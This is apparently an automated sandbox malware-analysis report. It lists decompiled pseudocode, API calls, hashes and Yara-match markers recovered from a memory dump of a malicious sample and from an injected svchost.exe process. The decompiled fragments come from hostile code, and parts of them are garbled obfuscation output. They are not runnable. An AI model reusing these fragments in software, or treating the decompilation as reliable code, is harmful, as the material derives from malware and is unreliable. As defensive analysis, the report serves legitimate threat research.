                                      Uniqueness Score: -1.00%

                                      Function 00407226, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65threadwindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 60%
                                      			E00407226(void* __ebx, intOrPtr* _a4, intOrPtr _a8, long _a12) {
				char _v64;
				void* _t8;
				void* _t10;
				int _t11;
				void* _t23;
				void* _t26;
				long _t29;
				int _t33;
				void* _t35;

				asm("fiadd dword [esi-0x19]");
				asm("int3");
				if(__ebx - 1 >= 0) {
					 *[cs:eax] =  *[cs:eax] + _t8;
					E0041AD20( &_v64, 3);
					_t10 = E00409B40(__eflags, _a8 + 0x1c,  &_v64); // executed
					_t11 = E00413E50(_a8 + 0x1c, _t10, 0, 0, 0xc4e7b6d6);
					_t33 = _t11;
					__eflags = _t33;
					if(_t33 != 0) {
						_t29 = _a12;
						_t11 = PostThreadMessageW(_t29, 0x111, 0, 0); // executed
						__eflags = _t11;
						if(__eflags == 0) {
							_t11 =  *_t33(_t29, 0x8003, _t35 + (E004092A0(__eflags, 1, 8) & 0x000000ff) - 0x40, _t11);
						}
					}
					return _t11;
				} else {
					asm("sti");
					_push(_t35);
					_t26 = E004199F0(_t23);
					if(_t26 == 0 || _t26 == 0x33333333) {
						__eflags = 0;
						return 0;
					} else {
						return  *_a4 + _t26;
					}
				}
			}












                                      0x00407227
                                      0x0040722a
                                      0x0040722b
                                      0x00407295
                                      0x0040729e
                                      0x004072ae
                                      0x004072be
                                      0x004072c3
                                      0x004072c8
                                      0x004072ca
                                      0x004072cd
                                      0x004072da
                                      0x004072dc
                                      0x004072de
                                      0x004072fb
                                      0x004072fb
                                      0x004072fd
                                      0x00407302
                                      0x0040722d
                                      0x0040722d
                                      0x00407230
                                      0x00407238
                                      0x0040723c
                                      0x0040724f
                                      0x00407252
                                      0x00407246
                                      0x0040724e
                                      0x0040724e
                                      0x0040723c

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID: 3333
                                      • API String ID: 1836367815-2924271548
                                      • Opcode ID: d0f49b6c557c57bd69689eecb791474343fa6f0706b0a24d00684018ef9fb871
                                      • Instruction ID: bb3da49a10280d2408cfb47af4fb67369b480fbd4d95926373e596e4ef66396c
                                      • Opcode Fuzzy Hash: d0f49b6c557c57bd69689eecb791474343fa6f0706b0a24d00684018ef9fb871
                                      • Instruction Fuzzy Hash: F001DB32B402187BEB255A959C42FBE73585F41724F09456EFE04FB2C1D978BD0147DA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418922, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E00418922(void* __eax, void* __esi, void* __eflags) {
				void* _t15;
				void* _t21;
				void* _t25;

				asm("in al, 0x5a");
				if(__eflags >= 0) {
					__esp = __esp -  *__eax;
					_t6 = __eax;
					__eax = __ebp;
					__ebp = _t6;
					__esi = __esi -  *((intOrPtr*)(__ebp - 0x68d1285a));
					__eflags = __esi;
					_push(__ebp);
					__ebp = __esp;
					__eax =  *((intOrPtr*)(__ebp + 8));
					_push(__esi);
					__esi =  *((intOrPtr*)(__ebp + 8)) + 0xc7c;
					__eax =  *__esi;
					ExitProcess( *(__ebp + 0xc));
				}
				_push(__esi);
				E004191E0(_t21, __eax, __eax + 0xc70,  *((intOrPtr*)(__eax + 0x10)), 0, 0x34);
				_t5 = _t25 + 0xc; // 0x413536
				_t15 = RtlAllocateHeap( *_t5,  *(_t25 + 0x10),  *(_t25 + 0x14)); // executed
				return _t15;
			}






                                      0x00418923
                                      0x00418925
                                      0x00418927
                                      0x00418929
                                      0x00418929
                                      0x00418929
                                      0x0041892a
                                      0x0041892a
                                      0x00418930
                                      0x00418931
                                      0x00418933
                                      0x0041893c
                                      0x00418942
                                      0x00418952
                                      0x00418958
                                      0x00418958
                                      0x004188b9
                                      0x004188c7
                                      0x004188d2
                                      0x004188dd
                                      0x004188e1

                                      APIs
                                      • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: 65A
                                      • API String ID: 1279760036-2085483392
                                      • Opcode ID: 7d1722c8af5a631259abeede85f067216dd937713950d848d5cf086466221e74
                                      • Instruction ID: d37eb002c2572a8e9385782245005f4739f68624aaf3d765969823bc7484deb9
                                      • Opcode Fuzzy Hash: 7d1722c8af5a631259abeede85f067216dd937713950d848d5cf086466221e74
                                      • Instruction Fuzzy Hash: 15E0EDB2600210BFDB04EF24DC48EE77768AF85314F000149F9082B181C631F915CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				intOrPtr _t7;
				void* _t10;
				void* _t15;

				_t7 = _a4;
				E004191E0(_t15, _t7, _t7 + 0xc70,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}






                                      0x004188b3
                                      0x004188c7
                                      0x004188d2
                                      0x004188dd
                                      0x004188e1

                                      APIs
                                      • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: 65A
                                      • API String ID: 1279760036-2085483392
                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t10;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				_t10 = E0041A140( &_v67, 0, 0x3f);
				 *[cs:eax] =  *[cs:eax] + _t10;
				E0041AD20( &_v68, 3);
				_t12 = E00409B40(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                      0x00407280
                                      0x0040728f
                                      0x00407293
                                      0x00407295
                                      0x0040729e
                                      0x004072ae
                                      0x004072be
                                      0x004072c3
                                      0x004072ca
                                      0x004072cd
                                      0x004072da
                                      0x004072dc
                                      0x004072de
                                      0x004072fb
                                      0x004072fb
                                      0x00000000
                                      0x004072fd
                                      0x00407302

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                      • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                      • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                      • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418A41, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00418A41(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t12;
				void* _t17;

				asm("sbb al, 0xad");
				asm("out dx, al");
				asm("loop 0x71");
				asm("adc dword [eax+0x42], 0x558001fe");
				_t9 = _a4;
				E004191E0(_t17, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t12;
			}





                                      0x00418a41
                                      0x00418a47
                                      0x00418a48
                                      0x00418a4a
                                      0x00418a53
                                      0x00418a6a
                                      0x00418a80
                                      0x00418a84

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: f725a72bedf8c0ff181c2956e0e1214f8de1bef356d8e08221fc1d92a17afd5d
                                      • Instruction ID: 9c8d8015ae29351a61f88a0b021781761be0796261ca022bcdc066489fd6541c
                                      • Opcode Fuzzy Hash: f725a72bedf8c0ff181c2956e0e1214f8de1bef356d8e08221fc1d92a17afd5d
                                      • Instruction Fuzzy Hash: BEF0E2B52102046BDB24EF84DC45ED73778EF84390F00405AFA0C5B202D535EC12C7B4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004188E2, Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 64%
                                      			E004188E2(void* __ebx, intOrPtr _a12, void* _a16, long _a20, void* _a24) {
				char _t13;
				void* _t20;

				_pop(ss);
				asm("adc dh, [edi-0x741374ab]");
				_t10 = _a12;
				_t4 = _t10 + 0xc74; // 0xc74
				E004191E0(_t20, _a12, _t4,  *((intOrPtr*)(_a12 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a16, _a20, _a24); // executed
				return _t13;
			}





                                      0x004188e2
                                      0x004188ee
                                      0x004188f3
                                      0x004188ff
                                      0x00418907
                                      0x0041891d
                                      0x00418921

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: fecbff86ccccd9137869245da2cc6efcea64c78036194e6694fcea5b9838fcc0
                                      • Instruction ID: 6c9a6f2228e3fe3dc02cfb538dd98853b085b7272bc1ed21640716773b5544fd
                                      • Opcode Fuzzy Hash: fecbff86ccccd9137869245da2cc6efcea64c78036194e6694fcea5b9838fcc0
                                      • Instruction Fuzzy Hash: 94E068F82081C56BEB12EF78D8D08DB7F90AF81220708858EECD807307C525D55ACB70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x004188ff
                                      0x00418907
                                      0x0041891d
                                      0x00418921

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x00418a6a
                                      0x00418a80
                                      0x00418a84

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418876, Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: 2e37f0a78afbb191663dee5913bf4466ca98e8be0ad353d73eadfcbe087a9ab3
                                      • Instruction ID: ea8e1d95aa463106d7998eac378d95181b94b8865d117edf770d4ae0ec492ebb
                                      • Opcode Fuzzy Hash: 2e37f0a78afbb191663dee5913bf4466ca98e8be0ad353d73eadfcbe087a9ab3
                                      • Instruction Fuzzy Hash: 22E026B4104346ABDB10EF69D880897BB95FFC0314300860EF84847703C234C8AACB70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                      0x00418933
                                      0x0041894a
                                      0x00418958

                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
                                      • Instruction ID: 8a38b42fe32e271f9afc1009965e08f4e64431d8948f43410f85fe4134f53a69
                                      • Opcode Fuzzy Hash: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
                                      • Instruction Fuzzy Hash: 8FB092B29064C5CAEB11E7B04A08B2B7E04BBE0741F27C076E2120681B4778C491F6B6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 0040C37A, Relevance: .1, Instructions: 58COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 23%
                                      			E0040C37A(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, void* __esi, void* __fp0) {
				signed char _t9;
				int _t10;
				signed char _t22;
				void* _t25;

				_t9 = __eax | __edx;
				_t10 = _t9;
				if(_t9 < 0) {
					asm("popad");
					asm("xlatb");
					 *((intOrPtr*)(_t25 - 0xbe4f5c8)) =  *((intOrPtr*)(_t25 - 0xbe4f5c8)) - _t10;
					asm("adc bl, ah");
					asm("adc edx, [ebx-0x7fce734]");
					asm("rol byte [esi-0x3e769a20], 0x1a");
					asm("loopne 0x29");
					asm("adc [ebx], ebp");
					_t22 = 0x000000e6 | __ebx;
					asm("loopne 0x7c");
					 *(_t25 - 1 + 0x60bdaec3) =  *(_t25 - 1 + 0x60bdaec3) ^ __ebx;
					asm("adc [edi+0x21], ebx");
					asm("a16 salc");
					_push(_t22);
					return _t22;
				} else {
					asm("xlatb");
					asm("aam 0xa3");
					memset(_t25, _t10, __ecx << 2);
					asm("lodsd");
					return __ebx;
				}
			}







                                      0x0040c37a
                                      0x0040c37c
                                      0x0040c37d
                                      0x0040c3d5
                                      0x0040c3d9
                                      0x0040c3da
                                      0x0040c3e0
                                      0x0040c3e2
                                      0x0040c3eb
                                      0x0040c3f2
                                      0x0040c3f4
                                      0x0040c3f7
                                      0x0040c3f9
                                      0x0040c3fb
                                      0x0040c401
                                      0x0040c404
                                      0x0040c408
                                      0x0040c41d
                                      0x0040c37f
                                      0x0040c37f
                                      0x0040c382
                                      0x0040c389
                                      0x0040c38c
                                      0x0040c38d
                                      0x0040c38d

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4befdd1ed447d5a491e2625f79c49951acdd7135b8cea54b24b745616e202cc1
                                      • Instruction ID: a87379bcd7b92c99abfc46f2d2f3fa94bbfbab64f5b3365853ef1ef2123a839f
                                      • Opcode Fuzzy Hash: 4befdd1ed447d5a491e2625f79c49951acdd7135b8cea54b24b745616e202cc1
                                      • Instruction Fuzzy Hash: 7B017072A4519187C7024E65AC946E2F771FBC3351B1C12BBCC49AF183D3784C5597DA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C3CA, Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6393dcddf63f7da8b22a4cbd0a0f9bd6a52331a432dc385b2df44f5c290544da
                                      • Instruction ID: 376fee84827810746c10649541411dfdc4a617a4fc65b6144471750feda61f77
                                      • Opcode Fuzzy Hash: 6393dcddf63f7da8b22a4cbd0a0f9bd6a52331a432dc385b2df44f5c290544da
                                      • Instruction Fuzzy Hash: 79F09E73E4459286D3419E6098442F1F762FBC3316B2C13AFCC8967402D354581286CA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B0FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 53%
                                      			E00B0FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00ABCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B05720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B05720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                      0x00b0fdda
                                      0x00b0fde2
                                      0x00b0fde5
                                      0x00b0fdec
                                      0x00b0fdfa
                                      0x00b0fdff
                                      0x00b0fe0a
                                      0x00b0fe0f
                                      0x00b0fe17
                                      0x00b0fe1e
                                      0x00b0fe19
                                      0x00b0fe19
                                      0x00b0fe19
                                      0x00b0fe20
                                      0x00b0fe21
                                      0x00b0fe22
                                      0x00b0fe25
                                      0x00b0fe40

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B0FDFA
                                      Strings
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B0FE01
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B0FE2B
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
                                      • Instruction ID: acea7fd983f31da6c1ca6c994c62319758937d631e160ad9cbbf45cef84d7896
                                      • Opcode Fuzzy Hash: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
                                      • Instruction Fuzzy Hash: 6EF0F632200601BFD6301A45DC06F73BFAAEB44730F240354F628565E2DA62FC2097F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: svchost.exe PID: 6564 Parent PID: 3352 svchost.exeCOMMON

                                      Executed Functions

                                      Function 02F285DA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02F23BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F23BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02F2862D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 8749f80faae6d9f9409aa75c61280400cc64edf9b88f9ed251a6fdadc2f594db
                                      • Instruction ID: 6f18d2506b33dccc98d05c48e3dd4e1549d1eafaf2c7fabb380a85a497b61619
                                      • Opcode Fuzzy Hash: 8749f80faae6d9f9409aa75c61280400cc64edf9b88f9ed251a6fdadc2f594db
                                      • Instruction Fuzzy Hash: 7901C9B6215208AFCB48CF88DC84DEB77A9FF8C354F158248FA1D97240C630E815CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F285E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02F23BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F23BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02F2862D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
